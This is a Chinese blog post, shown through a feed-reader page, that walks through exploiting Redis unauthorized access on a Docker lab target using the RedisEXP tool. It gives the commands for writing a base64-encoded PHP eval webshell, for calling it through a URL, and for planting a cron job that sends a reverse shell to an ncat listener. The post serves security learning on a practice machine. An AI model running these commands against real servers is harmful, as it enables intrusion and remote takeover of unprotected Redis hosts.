惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Cyberwarzone
Cyberwarzone
Vercel News
Vercel News
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
aimingoo的专栏
aimingoo的专栏
B
Blog RSS Feed
A
About on SuperTechFans
T
The Blog of Author Tim Ferriss
爱范儿
爱范儿
腾讯CDC
S
SegmentFault 最新的问题
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
The Hacker News
The Hacker News
J
Java Code Geeks
大猫的无限游戏
大猫的无限游戏
B
Blog
IT之家
IT之家
Spread Privacy
Spread Privacy
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
C
Cisco Blogs
Recent Announcements
Recent Announcements
H
Hacker News: Front Page
AI
AI
I
InfoQ
H
Heimdal Security Blog
T
Threatpost
Cisco Talos Blog
Cisco Talos Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
I
Intezer
W
WeLiveSecurity
SecWiki News
SecWiki News
MongoDB | Blog
MongoDB | Blog
宝玉的分享
宝玉的分享
博客园 - 【当耐特】
云风的 BLOG
云风的 BLOG
T
Threat Research - Cisco Blogs
V2EX - 技术
V2EX - 技术
N
News and Events Feed by Topic
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
O
OpenAI News
阮一峰的网络日志
阮一峰的网络日志
T
Troy Hunt's Blog
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园 - 司徒正美
Apple Machine Learning Research
Apple Machine Learning Research
雷峰网
雷峰网
T
Tor Project blog
有赞技术团队
有赞技术团队
Schneier on Security
Schneier on Security
Last Week in AI
Last Week in AI

lololowe的博客

《防火墙项目化实战 (基于华为eNSP)》笔记 华为VLAN高级特性与协议详解 DNS 跨平台托管 CVE-2026-0073 安卓调试桥漏洞复现 使用 Bettercap 进行 HTTPS 中间人攻击:SSL 剥离和 HSTS 绕过 Yakit测试PortSwigger靶场-未授权访问 visio导入Mermaid流程图(SVG格式) 什么是 TiT (TLS in TLS) 特征以及如何消除特征 部署 Wireguard VPN 实现异地组网 实现防御ARP劫持与主动反击 华为VRP系统基本操作 mrs文件转换与查看 电脑垃圾清理技巧分享 QQ音乐 2015-2025 年度听歌报告链接汇总 基于DevStack快速部署OpenStack
Redis未授权访问漏洞复现
lololowe · 2026-04-07 · via lololowe的博客

AI初始化中...

介绍自己 🙈

生成本文简介 👋

推荐相关文章 📖

前往主页 🏠

前往爱发电购买

网络安全环境配置Redis

部署环境

环境来源:

Docker一键安装脚本(二选一):

1
2
bash <(curl -sL kejilion.sh) docker install
bash <(curl -sSL https://linuxmirrors.cn/docker.sh)

Docker 部署命令:

1
2
docker pull yanglisianthus/redis-unauth-hub
docker run --restart always -d -p 10081:80 -p 10022:22 -p 16379:6379 --name redishub yanglisianthus/redis-unauth-hub

复现漏洞

用 RedisEXP 工具复现漏洞:https://github.com/yuyan-sec/RedisEXP

写 webshell

1
RedisEXP_windows_amd64.exe -m shell -r 10.0.0.5 -p 16379 -rp /var/www/html -rf shell.php -s PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7Pz4= -b
  • -m shell: 写webshell
  • -r 10.0.0.5: 目标IP
  • -p 16379: 目标端口
  • -rp /var/www/html: 目标路径
  • -rf shell.php: 目标文件名
  • -s PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7Pz4=: Webshell内容,base64编码后为
  • -b: 解码base64内容

alt text

上图中显示的redis命令,也可以用redis-cli或者navicat等客户端连接工具进行手工复现。

靶机的/var/www/html目录下将生成shell.php文件:

alt text

浏览器访问 http://10.0.0.5:10081/shell.php?cmd=phpinfo(); 可以查看靶机的phpinfo信息:

alt text

或者用蚁剑连接靶机获取shell:

alt text

alt text

写定时任务

攻击机用ncat监听9001端口,等待靶机反弹shell:

1
ncat -lnk 9001

攻击机运行攻击命令:

1
RedisEXP_windows_amd64.exe -m cron -r 10.0.0.5 -p 16379 -L 10.0.100.1 -P 9001
  • -m cron: 写定时任务
  • -r 10.0.0.5: 目标IP
  • -p 16379: 目标端口
  • -L 10.0.100.1: 本机IP
  • -P 9001: 本机端口

运行后每间隔一分钟,靶机就会执行一次定时任务,反弹shell到攻击机:

alt text

alt text

推荐阅读

  1. 浅析Linux下Redis的攻击面(一):https://xz.aliyun.com/news/7569
  2. Redis常见漏洞利用方法总结|Redis未授权访问漏洞利用方式:https://www.ddosi.org/redis-ssh/

头像头像

lololowe

恬淡无为

打赏作者

感谢你赐予我前进的力量

  • Bitcoin

    Bitcoin

  • Ethereum

    Ethereum

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 lololowe的博客